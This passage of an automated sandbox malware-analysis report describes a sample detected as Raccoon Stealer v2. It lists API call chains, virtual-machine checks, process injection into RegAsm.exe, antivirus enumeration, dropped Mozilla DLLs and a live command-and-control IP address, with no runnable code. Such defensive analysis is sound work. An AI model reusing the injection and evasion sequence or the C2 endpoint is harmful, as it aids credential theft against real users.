3_2_0040F788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408109 OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	3_2_00408109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FC1E CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,SetEnvironmentVariableA,CloseHandle,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,SetEnvironmentVariableA,GetLastError,CancelWaitableTimer,GetLastError,CreateToolhelp32Snapshot,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,Process32FirstW,lstrcmpiW,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,LocalAlloc,OutputDebugStringA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,GetLastError,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,CreateMutexA,ReleaseMutex,GetLastError,SetEnvironmentVariableA,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,	3_2_0040FC1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403E9F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00403E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004087AA LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	3_2_004087AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040392D LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_0040392D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004041AD StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_004041AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004017B3 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	3_2_004017B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407938 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_00407938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F23A lstrlenA,lstrlenA,lstrlenA,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,GetLastError,CloseHandle,OutputDebugStringA,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,RegOpenKeyExA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,LocalAlloc,LocalFree,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,CloseHandle,GetLastError,GetLastError,CreateMutexA,GetLastError,ReleaseMutex,FindFirstFileA,FindClose,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,SetEnvironmentVariableA,GlobalFree,	3_2_0040F23A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E83D CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,LocalAlloc,lstrlenW,LocalAlloc,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,OutputDebugStringA,CloseHandle,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,SetEnvironmentVariableA,LocalFree,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,StrCpyW,LocalFree,StrCpyW,LocalFree,	3_2_0040E83D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004103E1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040CF9A LocalAlloc,LocalAlloc,LocalAlloc,lstrlenA,lstrcpyn,lstrcpyn,lstrlenA,lstrcpyn,lstrcpyn,lstrlenA,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,

3_2_0040CF9A

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW BX
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.2418304008.000000000157F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_3-4199

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,

3_2_0040DC49

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00401000

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Code function: 0_2_031E52E9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_031E52E9

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 411000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 102A008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040CF9A cpuid

3_2_0040CF9A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,

3_2_0040CD2D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040F75C LocalAlloc,GetUserNameW,

3_2_0040F75C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040CE65 LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,

3_2_0040CE65

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1286483341.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe PID: 760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4812, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.154e88f.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 4812, type: MEMORYSTR

Remote Access Functionality

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1286483341.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe PID: 760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4812, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.154e88f.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	100%	Avira	HEUR/AGEN.1359509
SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://89.238.170.230/m	0%	Avira URL Cloud	safe
http://89.238.170.230/w	0%	Avira URL Cloud	safe
https://mozilla.org0	0%	Avira URL Cloud	safe
http://89.238.170.230:80	0%	Avira URL Cloud	safe
http://89.238.170.230/	0%	Avira URL Cloud	safe
http://89.238.170.230/	2%	Virustotal		Browse
http://89.238.170.230:80	2%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://89.238.170.230:80	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://89.238.170.230/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.3.dr	false		high
http://89.238.170.230/m	RegAsm.exe, 00000003.00000002.2418304008.0000000001561000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0	softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	false	Avira URL Cloud: safe	unknown
http://89.238.170.230/w	RegAsm.exe, 00000003.00000002.2418304008.000000000153A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.238.170.230	unknown	United Kingdom		9009	M247GB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417514
Start date and time:	2024-03-29 14:23:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/12@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:24:02	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	62.216.85.110
	arm.elf	Get hash	malicious	Mirai	Browse	185.216.48.170
	https://pp.45-61-132-44.cprapid.com/pp/	Get hash	malicious	PayPal Phisher	Browse	45.61.132.44
	https://pa.45-61-133-61.cprapid.com/pp/	Get hash	malicious	PayPal Phisher	Browse	45.61.133.61
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	185.186.76.246
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	38.207.19.49
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	38.207.19.49
	97zyqEu4Nh.elf	Get hash	malicious	Moobot	Browse	178.171.24.198
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	185.186.76.195
	https://hp.com@ef5b25eb.fee1d7d7dc65455518affcd7.workers.dev/?qrc=mr.been@uk.com	Get hash	malicious	HTMLPhisher	Browse	185.186.76.246

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\LocalLow\mozglue.dll	SnI2yBH5jJ.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	K3lQsBC5we.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	TCr4xC4lxh.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	o6zadjW4dI.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	47e12c36a9b6477267c4bc403855aff35a346ff0ef432.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	SnI2yBH5jJ.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	K3lQsBC5we.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	TCr4xC4lxh.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	o6zadjW4dI.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	47e12c36a9b6477267c4bc403855aff35a346ff0ef432.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse

Created / dropped Files

